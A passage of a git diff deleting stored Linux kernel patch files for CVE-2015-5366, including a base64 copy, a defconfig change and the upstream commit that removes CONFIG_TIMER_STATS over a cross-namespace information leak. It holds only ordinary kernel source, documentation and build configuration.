sIGJhc2UsIHRydWUpOwotCX0KKwogCXNwaW5fdW5sb2NrX2lycXJlc3RvcmUoJmJhc2UtPmxvY2ssIGZsYWdzKTsKIAogCXJldHVybiByZXQ7CkBAIC0xMTkyLDggKzExNTUsNiBAQAogCQkJZm4gPSB0aW1lci0+ZnVuY3Rpb247CiAJCQlkYXRhID0gdGltZXItPmRhdGE7CiAJCQlpcnFzYWZlID0gdGJhc2VfZ2V0X2lycXNhZmUodGltZXItPmJhc2UpOwotCi0JCQl0aW1lcl9zdGF0c19hY2NvdW50X3RpbWVyKHRpbWVyKTsKIAogCQkJYmFzZS0+cnVubmluZ190aW1lciA9IHRpbWVyOwogCQkJZGV0YWNoX2V4cGlyZWRfdGltZXIodGltZXIsIGJhc2UpOwpAQCAtMTY5NSw3ICsxNjU2LDYgQEAKIAogCWVyciA9IHRpbWVyX2NwdV9ub3RpZnkoJnRpbWVyc19uYiwgKHVuc2lnbmVkIGxvbmcpQ1BVX1VQX1BSRVBBUkUsCiAJCQkgICAgICAgKHZvaWQgKikobG9uZylzbXBfcHJvY2Vzc29yX2lkKCkpOwotCWluaXRfdGltZXJfc3RhdHMoKTsKIAogCUJVR19PTihlcnIgIT0gTk9USUZZX09LKTsKIApkaWZmIC0tZ2l0IGEva2VybmVsL3dvcmtxdWV1ZS5jIGIva2VybmVsL3dvcmtxdWV1ZS5jCmluZGV4IDI1MDU2NDguLjU2MmYxYTUgMTAwNzU1Ci0tLSBhL2tlcm5lbC93b3JrcXVldWUuYworKysgYi9rZXJuZWwvd29ya3F1ZXVlLmMKQEAgLTE0NDgsOCArMTQ0OCw2IEBACiAJCXJldHVybjsKIAl9CiAKLQl0aW1lcl9zdGF0c190aW1lcl9zZXRfc3RhcnRfaW5mbygmZHdvcmstPnRpbWVyKTsKLQogCWR3b3JrLT53cSA9IHdxOwogCWR3b3JrLT5jcHUgPSBjcHU7CiAJdGltZXItPmV4cGlyZXMgPSBqaWZmaWVzICsgZGVsYXk7CmRpZmYgLS1naXQgYS9saWIvS2NvbmZpZy5kZWJ1ZyBiL2xpYi9LY29uZmlnLmRlYnVnCmluZGV4IGEwODE4ZjEuLjgyMmUyYmUgMTAwNzU1Ci0tLSBhL2xpYi9LY29uZmlnLmRlYnVnCisrKyBiL2xpYi9LY29uZmlnLmRlYnVnCkBAIC00MDAsMjAgKzQwMCw2IEBACiAJICBhcHBsaWNhdGlvbiwgeW91IGNhbiBzYXkgTiB0byBhdm9pZCB0aGUgdmVyeSBzbGlnaHQgb3ZlcmhlYWQKIAkgIHRoaXMgYWRkcy4KIAotY29uZmlnIFRJTUVSX1NUQVRTCi0JYm9vbCAiQ29sbGVjdCBrZXJuZWwgdGltZXJzIHN0YXRpc3RpY3MiCi0JZGVwZW5kcyBvbiBERUJVR19LRVJORUwgJiYgUFJPQ19GUwotCWhlbHAKLQkgIElmIHlvdSBzYXkgWSBoZXJlLCBhZGRpdGlvbmFsIGNvZGUgd2lsbCBiZSBpbnNlcnRlZCBpbnRvIHRoZQotCSAgdGltZXIgcm91dGluZXMgdG8gY29sbGVjdCBzdGF0aXN0aWNzIGFib3V0IGtlcm5lbCB0aW1lcnMgYmVpbmcKLQkgIHJlcHJvZ3JhbW1lZC4gVGhlIHN0YXRpc3RpY3MgY2FuIGJlIHJlYWQgZnJvbSAvcHJvYy90aW1lcl9zdGF0cy4KLQkgIFRoZSBzdGF0aXN0aWNzIGNvbGxlY3Rpb24gaXMgc3RhcnRlZCBieSB3cml0aW5nIDEgdG8gL3Byb2MvdGltZXJfc3RhdHMsCi0JICB3cml0aW5nIDAgc3RvcHMgaXQuIFRoaXMgZmVhdHVyZSBpcyB1c2VmdWwgdG8gY29sbGVjdCBpbmZvcm1hdGlvbgotCSAgYWJvdXQgdGltZXIgdXNhZ2UgcGF0dGVybnMgaW4ga2VybmVsIGFuZCB1c2Vyc3BhY2UuIFRoaXMgZmVhdHVyZQotCSAgaXMgbGlnaHR3ZWlnaHQgaWYgZW5hYmxlZCBpbiB0aGUga2VybmVsIGNvbmZpZyBidXQgbm90IGFjdGl2YXRlZAotCSAgKGl0IGRlZmF1bHRzIHRvIGRlYWN0aXZhdGVkIG9uIGJvb3R1cCBhbmQgd2lsbCBvbmx5IGJlIGFjdGl2YXRlZAotCSAgaWYgc29tZSBhcHBsaWNhdGlvbiBsaWtlIHBvd2VydG9wIGFjdGl2YXRlcyBpdCBleHBsaWNpdGx5KS4KLQogY29uZmlnIERFQlVHX09CSkVDVFMKIAlib29sICJEZWJ1ZyBvYmplY3Qgb3BlcmF0aW9ucyIKIAlkZXBlbmRzIG9uIERFQlVHX0tFUk5FTAo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch
deleted file mode 100644
index 90b2f55c..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch
+++ /dev/null
@@ -1,20 +0,0 @@
-From 63d41fb2b101ff0bd786deab3c60114d38d47048 Mon Sep 17 00:00:00 2001
-From: Christopher R. Palmer <crpalmer@gmail.com>
-Date: Sat, 29 Apr 2017 06:44:14 -0400
-Subject: [PATCH] pme: defconfig: Remove CONFIG_TIMER_STATS
-
-Change-Id: Ib4c88393eccc70e998f3a7dcc9f9a4de5230735c
----
-
-diff --git a/arch/arm64/configs/pme_defconfig b/arch/arm64/configs/pme_defconfig
-index b145bb6..6ad8818 100644
---- a/arch/arm64/configs/pme_defconfig
-+++ b/arch/arm64/configs/pme_defconfig
-@@ -4414,7 +4414,6 @@
- # CONFIG_PANIC_ON_RT_THROTTLING is not set
- # CONFIG_SCHEDSTATS is not set
- # CONFIG_SCHED_STACK_END_CHECK is not set
--CONFIG_TIMER_STATS=y
- # CONFIG_DEBUG_MODULE_SCAN_OFF is not set
- # CONFIG_DEBUG_TASK_STACK_SCAN_OFF is not set
- # CONFIG_DEBUG_PREEMPT is not set
diff --git a/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch.base64
deleted file mode 100644
index 577a36e4..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA2M2Q0MWZiMmIxMDFmZjBiZDc4NmRlYWIzYzYwMTE0ZDM4ZDQ3MDQ4IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBDaHJpc3RvcGhlciBSLiBQYWxtZXIgPGNycGFsbWVyQGdtYWlsLmNvbT4KRGF0ZTogU2F0LCAyOSBBcHIgMjAxNyAwNjo0NDoxNCAtMDQwMApTdWJqZWN0OiBbUEFUQ0hdIHBtZTogZGVmY29uZmlnOiBSZW1vdmUgQ09ORklHX1RJTUVSX1NUQVRTCgpDaGFuZ2UtSWQ6IEliNGM4ODM5M2VjY2M3MGU5OThmM2E3ZGNjOWY5YTRkZTUyMzA3MzVjCi0tLQoKZGlmZiAtLWdpdCBhL2FyY2gvYXJtNjQvY29uZmlncy9wbWVfZGVmY29uZmlnIGIvYXJjaC9hcm02NC9jb25maWdzL3BtZV9kZWZjb25maWcKaW5kZXggYjE0NWJiNi4uNmFkODgxOCAxMDA2NDQKLS0tIGEvYXJjaC9hcm02NC9jb25maWdzL3BtZV9kZWZjb25maWcKKysrIGIvYXJjaC9hcm02NC9jb25maWdzL3BtZV9kZWZjb25maWcKQEAgLTQ0MTQsNyArNDQxNCw2IEBACiAjIENPTkZJR19QQU5JQ19PTl9SVF9USFJPVFRMSU5HIGlzIG5vdCBzZXQKICMgQ09ORklHX1NDSEVEU1RBVFMgaXMgbm90IHNldAogIyBDT05GSUdfU0NIRURfU1RBQ0tfRU5EX0NIRUNLIGlzIG5vdCBzZXQKLUNPTkZJR19USU1FUl9TVEFUUz15CiAjIENPTkZJR19ERUJVR19NT0RVTEVfU0NBTl9PRkYgaXMgbm90IHNldAogIyBDT05GSUdfREVCVUdfVEFTS19TVEFDS19TQ0FOX09GRiBpcyBub3Qgc2V0CiAjIENPTkZJR19ERUJVR19QUkVFTVBUIGlzIG5vdCBzZXQK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-5366/^4.9/0003.patch b/Patches/Linux_CVEs/CVE-2015-5366/^4.9/0003.patch
deleted file mode 100644
index b7bd1067..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5366/^4.9/0003.patch
+++ /dev/null
@@ -1,939 +0,0 @@
-From dfb4357da6ddbdf57d583ba64361c9d792b0e0b1 Mon Sep 17 00:00:00 2001
-From: Kees Cook <keescook@chromium.org>
-Date: Wed, 8 Feb 2017 11:26:59 -0800
-Subject: time: Remove CONFIG_TIMER_STATS
-
-Currently CONFIG_TIMER_STATS exposes process information across namespaces:
-
-kernel/time/timer_list.c print_timer():
-
-        SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
-
-/proc/timer_list:
-
- #11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570
-
-Given that the tracer can give the same information, this patch entirely
-removes CONFIG_TIMER_STATS.
-
-Suggested-by: Thomas Gleixner <tglx@linutronix.de>
-Signed-off-by: Kees Cook <keescook@chromium.org>
-Acked-by: John Stultz <john.stultz@linaro.org>
-Cc: Nicolas Pitre <nicolas.pitre@linaro.org>
-Cc: linux-doc@vger.kernel.org
-Cc: Lai Jiangshan <jiangshanlai@gmail.com>
-Cc: Shuah Khan <shuah@kernel.org>
-Cc: Xing Gao <xgao01@email.wm.edu>
-Cc: Jonathan Corbet <corbet@lwn.net>
-Cc: Jessica Frazelle <me@jessfraz.com>
-Cc: kernel-hardening@lists.openwall.com
-Cc: Nicolas Iooss <nicolas.iooss_linux@m4x.org>
-Cc: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>
-Cc: Petr Mladek <pmladek@suse.com>
-Cc: Richard Cochran <richardcochran@gmail.com>
-Cc: Tejun Heo <tj@kernel.org>
-Cc: Michal Marek <mmarek@suse.com>
-Cc: Josh Poimboeuf <jpoimboe@redhat.com>
-Cc: Dmitry Vyukov <dvyukov@google.com>
-Cc: Oleg Nesterov <oleg@redhat.com>
-Cc: "Eric W. Biederman" <ebiederm@xmission.com>
-Cc: Olof Johansson <olof@lixom.net>
-Cc: Andrew Morton <akpm@linux-foundation.org>
-Cc: linux-api@vger.kernel.org
-Cc: Arjan van de Ven <arjan@linux.intel.com>
-Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast
-Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
----
- Documentation/timers/timer_stats.txt |  73 ------
- include/linux/hrtimer.h              |  11 -
- include/linux/timer.h                |  45 ----
- kernel/kthread.c                     |   1 -
- kernel/time/Makefile                 |   1 -
- kernel/time/hrtimer.c                |  38 ----
- kernel/time/timer.c                  |  48 +---
- kernel/time/timer_list.c             |  10 -
- kernel/time/timer_stats.c            | 425 -----------------------------------
- kernel/workqueue.c                   |   2 -
- lib/Kconfig.debug                    |  14 --
- 11 files changed, 2 insertions(+), 666 deletions(-)
- delete mode 100644 Documentation/timers/timer_stats.txt
- delete mode 100644 kernel/time/timer_stats.c
-
-diff --git a/Documentation/timers/timer_stats.txt b/Documentation/timers/timer_stats.txt
-deleted file mode 100644
-index de835ee..0000000
---- a/Documentation/timers/timer_stats.txt
-+++ /dev/null
-@@ -1,73 +0,0 @@
--timer_stats - timer usage statistics
--------------------------------------
--
--timer_stats is a debugging facility to make the timer (ab)usage in a Linux
--system visible to kernel and userspace developers. If enabled in the config
--but not used it has almost zero runtime overhead, and a relatively small
--data structure overhead. Even if collection is enabled runtime all the
--locking is per-CPU and lookup is hashed.
--
--timer_stats should be used by kernel and userspace developers to verify that
--their code does not make unduly use of timers. This helps to avoid unnecessary
--wakeups, which should be avoided to optimize power consumption.
--
--It can be enabled by CONFIG_TIMER_STATS in the "Kernel hacking" configuration
--section.
--
--timer_stats collects information about the timer events which are fired in a
--Linux system over a sample period:
--
--- the pid of the task(process) which initialized the timer
--- the name of the process which initialized the timer
--- the function where the timer was initialized
--- the callback function which is associated to the timer
--- the number of events (callbacks)
--
--timer_stats adds an entry to /proc: /proc/timer_stats
--
--This entry is used to control the statistics functionality and to read out the
--sampled information.
--
--The timer_stats functionality is inactive on bootup.
--
--To activate a sample period issue:
--# echo 1 >/proc/timer_stats
--
--To stop a sample period issue:
--# echo 0 >/proc/timer_stats
--
--The statistics can be retrieved by:
--# cat /proc/timer_stats
--
--While sampling is enabled, each readout from /proc/timer_stats will see
--newly updated statistics. Once sampling is disabled, the sampled information
--is kept until a new sample period is started. This allows multiple readouts.
--
--Sample output of /proc/timer_stats:
--
--Timerstats sample period: 3.888770 s
--  12,     0 swapper          hrtimer_stop_sched_tick (hrtimer_sched_tick)
--  15,     1 swapper          hcd_submit_urb (rh_timer_func)
--   4,   959 kedac            schedule_timeout (process_timeout)
--   1,     0 swapper          page_writeback_init (wb_timer_fn)
--  28,     0 swapper          hrtimer_stop_sched_tick (hrtimer_sched_tick)
--  22,  2948 IRQ 4            tty_flip_buffer_push (delayed_work_timer_fn)
--   3,  3100 bash             schedule_timeout (process_timeout)
--   1,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--   1,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--   1,     1 swapper          neigh_table_init_no_netlink (neigh_periodic_timer)
--   1,  2292 ip               __netdev_watchdog_up (dev_watchdog)
--   1,    23 events/1         do_cache_clean (delayed_work_timer_fn)
--90 total events, 30.0 events/sec
--
--The first column is the number of events, the second column the pid, the third
--column is the name of the process. The forth column shows the function which
--initialized the timer and in parenthesis the callback function which was
--executed on expiry.
--
--    Thomas, Ingo
--
--Added flag to indicate 'deferrable timer' in /proc/timer_stats. A deferrable
--timer will appear as follows
--  10D,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--
-diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h
-index cdab81b..e52b427 100644
---- a/include/linux/hrtimer.h
-+++ b/include/linux/hrtimer.h
-@@ -88,12 +88,6 @@ enum hrtimer_restart {
-  * @base:	pointer to the timer base (per cpu and per clock)
-  * @state:	state information (See bit values above)
-  * @is_rel:	Set if the timer was armed relative
-- * @start_pid:  timer statistics field to store the pid of the task which
-- *		started the timer
-- * @start_site:	timer statistics field to store the site where the timer
-- *		was started
-- * @start_comm: timer statistics field to store the name of the process which
-- *		started the timer
-  *
-  * The hrtimer structure must be initialized by hrtimer_init()
-  */
-@@ -104,11 +98,6 @@ struct hrtimer {
- 	struct hrtimer_clock_base	*base;
- 	u8				state;
- 	u8				is_rel;
--#ifdef CONFIG_TIMER_STATS
--	int				start_pid;
--	void				*start_site;
--	char				start_comm[16];
--#endif
- };
- 
- /**
-diff --git a/include/linux/timer.h b/include/linux/timer.h
-index 51d601f..5a209b8 100644
---- a/include/linux/timer.h
-+++ b/include/linux/timer.h
-@@ -20,11 +20,6 @@ struct timer_list {
- 	unsigned long		data;
- 	u32			flags;
- 
--#ifdef CONFIG_TIMER_STATS
--	int			start_pid;
--	void			*start_site;
--	char			start_comm[16];
--#endif
- #ifdef CONFIG_LOCKDEP
- 	struct lockdep_map	lockdep_map;
- #endif
-@@ -197,46 +192,6 @@ extern int mod_timer_pending(struct timer_list *timer, unsigned long expires);
-  */
- #define NEXT_TIMER_MAX_DELTA	((1UL << 30) - 1)
- 
--/*
-- * Timer-statistics info:
-- */
--#ifdef CONFIG_TIMER_STATS
--
--extern int timer_stats_active;
--
--extern void init_timer_stats(void);
--
--extern void timer_stats_update_stats(void *timer, pid_t pid, void *startf,
--				     void *timerf, char *comm, u32 flags);
--
--extern void __timer_stats_timer_set_start_info(struct timer_list *timer,
--					       void *addr);
--
--static inline void timer_stats_timer_set_start_info(struct timer_list *timer)
--{
--	if (likely(!timer_stats_active))
--		return;
--	__timer_stats_timer_set_start_info(timer, __builtin_return_address(0));
--}
--
--static inline void timer_stats_timer_clear_start_info(struct timer_list *timer)
--{
--	timer->start_site = NULL;
--}
--#else
--static inline void init_timer_stats(void)
--{
--}
--
--static inline void timer_stats_timer_set_start_info(struct timer_list *timer)
--{
--}
--
--static inline void timer_stats_timer_clear_start_info(struct timer_list *timer)
--{
--}
--#endif
--
- extern void add_timer(struct timer_list *timer);
- 
- extern int try_to_del_timer_sync(struct timer_list *timer);
-diff --git a/kernel/kthread.c b/kernel/kthread.c
-index 2318fba..8461a43 100644
---- a/kernel/kthread.c
-+++ b/kernel/kthread.c
-@@ -850,7 +850,6 @@ void __kthread_queue_delayed_work(struct kthread_worker *worker,
- 
- 	list_add(&work->node, &worker->delayed_work_list);
- 	work->worker = worker;
--	timer_stats_timer_set_start_info(&dwork->timer);
- 	timer->expires = jiffies + delay;
- 	add_timer(timer);
- }
-diff --git a/kernel/time/Makefile b/kernel/time/Makefile
-index 976840d..938dbf3 100644
---- a/kernel/time/Makefile
-+++ b/kernel/time/Makefile
-@@ -15,6 +15,5 @@ ifeq ($(CONFIG_GENERIC_CLOCKEVENTS_BROADCAST),y)
- endif
- obj-$(CONFIG_GENERIC_SCHED_CLOCK)		+= sched_clock.o
- obj-$(CONFIG_TICK_ONESHOT)			+= tick-oneshot.o tick-sched.o
--obj-$(CONFIG_TIMER_STATS)			+= timer_stats.o
- obj-$(CONFIG_DEBUG_FS)				+= timekeeping_debug.o
- obj-$(CONFIG_TEST_UDELAY)			+= test_udelay.o
-diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
-index c6ecedd..edabde6 100644
---- a/kernel/time/hrtimer.c
-+++ b/kernel/time/hrtimer.c
-@@ -766,34 +766,6 @@ void hrtimers_resume(void)
- 	clock_was_set_delayed();
- }
- 
--static inline void timer_stats_hrtimer_set_start_info(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	if (timer->start_site)
--		return;
--	timer->start_site = __builtin_return_address(0);
--	memcpy(timer->start_comm, current->comm, TASK_COMM_LEN);
--	timer->start_pid = current->pid;
--#endif
--}
--
--static inline void timer_stats_hrtimer_clear_start_info(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--#endif
--}
--
--static inline void timer_stats_account_hrtimer(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	if (likely(!timer_stats_active))
--		return;
--	timer_stats_update_stats(timer, timer->start_pid, timer->start_site,
--				 timer->function, timer->start_comm, 0);
--#endif
--}
--
- /*
-  * Counterpart to lock_hrtimer_base above:
-  */
-@@ -932,7 +904,6 @@ remove_hrtimer(struct hrtimer *timer, struct hrtimer_clock_base *base, bool rest
- 		 * rare case and less expensive than a smp call.
- 		 */
- 		debug_deactivate(timer);
--		timer_stats_hrtimer_clear_start_info(timer);
- 		reprogram = base->cpu_base == this_cpu_ptr(&hrtimer_bases);
- 
- 		if (!restart)
-@@ -990,8 +961,6 @@ void hrtimer_start_range_ns(struct hrtimer *timer, ktime_t tim,
- 	/* Switch the timer base, if necessary: */
- 	new_base = switch_hrtimer_base(timer, base, mode & HRTIMER_MODE_PINNED);
- 
--	timer_stats_hrtimer_set_start_info(timer);
--
- 	leftmost = enqueue_hrtimer(timer, new_base);
- 	if (!leftmost)
- 		goto unlock;
-@@ -1128,12 +1097,6 @@ static void __hrtimer_init(struct hrtimer *timer, clockid_t clock_id,
- 	base = hrtimer_clockid_to_base(clock_id);
- 	timer->base = &cpu_base->clock_base[base];
- 	timerqueue_init(&timer->node);
--
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--	timer->start_pid = -1;
--	memset(timer->start_comm, 0, TASK_COMM_LEN);
--#endif
- }
- 
- /**
-@@ -1217,7 +1180,6 @@ static void __run_hrtimer(struct hrtimer_cpu_base *cpu_base,
- 	raw_write_seqcount_barrier(&cpu_base->seq);
- 
- 	__remove_hrtimer(timer, base, HRTIMER_STATE_INACTIVE, 0);
--	timer_stats_account_hrtimer(timer);
- 	fn = timer->function;
- 
- 	/*
-diff --git a/kernel/time/timer.c b/kernel/time/timer.c
-index ec33a69..82a6bfa 100644
---- a/kernel/time/timer.c
-+++ b/kernel/time/timer.c
-@@ -571,38 +571,6 @@ internal_add_timer(struct timer_base *base, struct timer_list *timer)
- 	trigger_dyntick_cpu(base, timer);
- }
- 
--#ifdef CONFIG_TIMER_STATS
--void __timer_stats_timer_set_start_info(struct timer_list *timer, void *addr)
--{
--	if (timer->start_site)
--		return;
--
--	timer->start_site = addr;
--	memcpy(timer->start_comm, current->comm, TASK_COMM_LEN);
--	timer->start_pid = current->pid;
--}
--
--static void timer_stats_account_timer(struct timer_list *timer)
--{
--	void *site;
--
--	/*
--	 * start_site can be concurrently reset by
--	 * timer_stats_timer_clear_start_info()
--	 */
--	site = READ_ONCE(timer->start_site);
--	if (likely(!site))
--		return;
--
--	timer_stats_update_stats(timer, timer->start_pid, site,
--				 timer->function, timer->start_comm,
--				 timer->flags);
--}
--
--#else
--static void timer_stats_account_timer(struct timer_list *timer) {}
--#endif
--
- #ifdef CONFIG_DEBUG_OBJECTS_TIMERS
- 
- static struct debug_obj_descr timer_debug_descr;
-@@ -789,11 +757,6 @@ static void do_init_timer(struct timer_list *timer, unsigned int flags,
- {
- 	timer->entry.pprev = NULL;
- 	timer->flags = flags | raw_smp_processor_id();
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--	timer->start_pid = -1;
--	memset(timer->start_comm, 0, TASK_COMM_LEN);
--#endif
- 	lockdep_init_map(&timer->lockdep_map, name, key, 0);
- }
- 
-@@ -1001,8 +964,6 @@ __mod_timer(struct timer_list *timer, unsigned long expires, bool pending_only)
- 		base = lock_timer_base(timer, &flags);
- 	}
- 
--	timer_stats_timer_set_start_info(timer);
--
- 	ret = detach_if_pending(timer, base, false);
- 	if (!ret && pending_only)
- 		goto out_unlock;
-@@ -1130,7 +1091,6 @@ void add_timer_on(struct timer_list *timer, int cpu)
- 	struct timer_base *new_base, *base;
- 	unsigned long flags;
- 
--	timer_stats_timer_set_start_info(timer);
- 	BUG_ON(timer_pending(timer) || !timer->function);
- 
- 	new_base = get_timer_cpu_base(timer->flags, cpu);
-@@ -1176,7 +1136,6 @@ int del_timer(struct timer_list *timer)
- 
- 	debug_assert_init(timer);
- 
--	timer_stats_timer_clear_start_info(timer);
- 	if (timer_pending(timer)) {
- 		base = lock_timer_base(timer, &flags);
- 		ret = detach_if_pending(timer, base, true);
-@@ -1204,10 +1163,9 @@ int try_to_del_timer_sync(struct timer_list *timer)
- 
- 	base = lock_timer_base(timer, &flags);
- 
--	if (base->running_timer != timer) {
--		timer_stats_timer_clear_start_info(timer);
-+	if (base->running_timer != timer)
- 		ret = detach_if_pending(timer, base, true);
--	}
-+
- 	spin_unlock_irqrestore(&base->lock, flags);
- 
- 	return ret;
-@@ -1331,7 +1289,6 @@ static void expire_timers(struct timer_base *base, struct hlist_head *head)
- 		unsigned long data;
- 
- 		timer = hlist_entry(head->first, struct timer_list, entry);
--		timer_stats_account_timer(timer);
- 
- 		base->running_timer = timer;
- 		detach_timer(timer, true);
-@@ -1868,7 +1825,6 @@ static void __init init_timer_cpus(void)
- void __init init_timers(void)
- {
- 	init_timer_cpus();
--	init_timer_stats();
- 	open_softirq(TIMER_SOFTIRQ, run_timer_softirq);
- }
- 
-diff --git a/kernel/time/timer_list.c b/kernel/time/timer_list.c
-index afe6cd1..387a3a5 100644
---- a/kernel/time/timer_list.c
-+++ b/kernel/time/timer_list.c
-@@ -62,21 +62,11 @@ static void
- print_timer(struct seq_file *m, struct hrtimer *taddr, struct hrtimer *timer,
- 	    int idx, u64 now)
- {
--#ifdef CONFIG_TIMER_STATS
--	char tmp[TASK_COMM_LEN + 1];
--#endif
- 	SEQ_printf(m, " #%d: ", idx);
- 	print_name_offset(m, taddr);
- 	SEQ_printf(m, ", ");
- 	print_name_offset(m, timer->function);
- 	SEQ_printf(m, ", S:%02x", timer->state);
--#ifdef CONFIG_TIMER_STATS
--	SEQ_printf(m, ", ");
--	print_name_offset(m, timer->start_site);
--	memcpy(tmp, timer->start_comm, TASK_COMM_LEN);
--	tmp[TASK_COMM_LEN] = 0;
--	SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
--#endif
- 	SEQ_printf(m, "\n");
- 	SEQ_printf(m, " # expires at %Lu-%Lu nsecs [in %Ld to %Ld nsecs]\n",
- 		(unsigned long long)ktime_to_ns(hrtimer_get_softexpires(timer)),
-diff --git a/kernel/time/timer_stats.c b/kernel/time/timer_stats.c
-deleted file mode 100644
-index afddded..0000000
---- a/kernel/time/timer_stats.c
-+++ /dev/null
-@@ -1,425 +0,0 @@
--/*
-- * kernel/time/timer_stats.c
-- *
-- * Collect timer usage statistics.
-- *
-- * Copyright(C) 2006, Red Hat, Inc., Ingo Molnar
-- * Copyright(C) 2006 Timesys Corp., Thomas Gleixner <tglx@timesys.com>
-- *
-- * timer_stats is based on timer_top, a similar functionality which was part of
-- * Con Kolivas dyntick patch set. It was developed by Daniel Petrini at the
-- * Instituto Nokia de Tecnologia - INdT - Manaus. timer_top's design was based
-- * on dynamic allocation of the statistics entries and linear search based
-- * lookup combined with a global lock, rather than the static array, hash
-- * and per-CPU locking which is used by timer_stats. It was written for the
-- * pre hrtimer kernel code and therefore did not take hrtimers into account.
-- * Nevertheless it provided the base for the timer_stats implementation and
-- * was a helpful source of inspiration. Kudos to Daniel and the Nokia folks
-- * for this effort.
-- *
-- * timer_top.c is
-- *	Copyright (C) 2005 Instituto Nokia de Tecnologia - INdT - Manaus
-- *	Written by Daniel Petrini <d.pensator@gmail.com>
-- *	timer_top.c was released under the GNU General Public License version 2
-- *
-- * We export the addresses and counting of timer functions being called,
-- * the pid and cmdline from the owner process if applicable.
-- *
-- * Start/stop data collection:
-- * # echo [1|0] >/proc/timer_stats
-- *
-- * Display the information collected so far:
-- * # cat /proc/timer_stats
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 as
-- * published by the Free Software Foundation.
-- */
--
--#include <linux/proc_fs.h>
--#include <linux/module.h>
--#include <linux/spinlock.h>
--#include <linux/sched.h>
--#include <linux/seq_file.h>
--#include <linux/kallsyms.h>
--
--#include <linux/uaccess.h>
--
--/*
-- * This is our basic unit of interest: a timer expiry event identified
-- * by the timer, its start/expire functions and the PID of the task that
-- * started the timer. We count the number of times an event happens:
-- */
--struct entry {
--	/*
--	 * Hash list:
--	 */
--	struct entry		*next;
--
--	/*
--	 * Hash keys:
--	 */
--	void			*timer;
--	void			*start_func;
--	void			*expire_func;
--	pid_t			pid;
--
--	/*
--	 * Number of timeout events:
--	 */
--	unsigned long		count;
--	u32			flags;
--
--	/*
--	 * We save the command-line string to preserve
--	 * this information past task exit:
--	 */
--	char			comm[TASK_COMM_LEN + 1];
--
--} ____cacheline_aligned_in_smp;
--
--/*
-- * Spinlock protecting the tables - not taken during lookup:
-- */
--static DEFINE_RAW_SPINLOCK(table_lock);
--
--/*
-- * Per-CPU lookup locks for fast hash lookup:
-- */
--static DEFINE_PER_CPU(raw_spinlock_t, tstats_lookup_lock);
--
--/*
-- * Mutex to serialize state changes with show-stats activities:
-- */
--static DEFINE_MUTEX(show_mutex);
--
--/*
-- * Collection status, active/inactive:
-- */
--int __read_mostly timer_stats_active;
--
--/*
-- * Beginning/end timestamps of measurement:
-- */
--static ktime_t time_start, time_stop;
--
--/*
-- * tstat entry structs only get allocated while collection is
-- * active and never freed during that time - this simplifies
-- * things quite a bit.
-- *
-- * They get freed when a new collection period is started.
-- */
--#define MAX_ENTRIES_BITS	10
--#define MAX_ENTRIES		(1UL << MAX_ENTRIES_BITS)
--
--static unsigned long nr_entries;
--static struct entry entries[MAX_ENTRIES];
--
--static atomic_t overflow_count;
--
--/*
-- * The entries are in a hash-table, for fast lookup:
-- */
--#define TSTAT_HASH_BITS		(MAX_ENTRIES_BITS - 1)
--#define TSTAT_HASH_SIZE		(1UL << TSTAT_HASH_BITS)
--#define TSTAT_HASH_MASK		(TSTAT_HASH_SIZE - 1)
--
--#define __tstat_hashfn(entry)						\
--	(((unsigned long)(entry)->timer       ^				\
--	  (unsigned long)(entry)->start_func  ^				\
--	  (unsigned long)(entry)->expire_func ^				\
--	  (unsigned long)(entry)->pid		) & TSTAT_HASH_MASK)
--
--#define tstat_hashentry(entry)	(tstat_hash_table + __tstat_hashfn(entry))
--
--static struct entry *tstat_hash_table[TSTAT_HASH_SIZE] __read_mostly;
--
--static void reset_entries(void)
--{
--	nr_entries = 0;
--	memset(entries, 0, sizeof(entries));
--	memset(tstat_hash_table, 0, sizeof(tstat_hash_table));
--	atomic_set(&overflow_count, 0);
--}
--
--static struct entry *alloc_entry(void)
--{
--	if (nr_entries >= MAX_ENTRIES)
--		return NULL;
--
--	return entries + nr_entries++;
--}
--
--static int match_entries(struct entry *entry1, struct entry *entry2)
--{
--	return entry1->timer       == entry2->timer	  &&
--	       entry1->start_func  == entry2->start_func  &&
--	       entry1->expire_func == entry2->expire_func &&
--	       entry1->pid	   == entry2->pid;
--}
--
--/*
-- * Look up whether an entry matching this item is present
-- * in the hash already. Must be called with irqs off and the
-- * lookup lock held:
-- */
--static struct entry *tstat_lookup(struct entry *entry, char *comm)
--{
--	struct entry **head, *curr, *prev;
--
--	head = tstat_hashentry(entry);
--	curr = *head;
--
--	/*
--	 * The fastpath is when the entry is already hashed,
--	 * we do this with the lookup lock held, but with the
--	 * table lock not held:
--	 */
--	while (curr) {
--		if (match_entries(curr, entry))
--			return curr;
--
--		curr = curr->next;
--	}
--	/*
--	 * Slowpath: allocate, set up and link a new hash entry:
--	 */
--	prev = NULL;
--	curr = *head;
--
--	raw_spin_lock(&table_lock);
--	/*
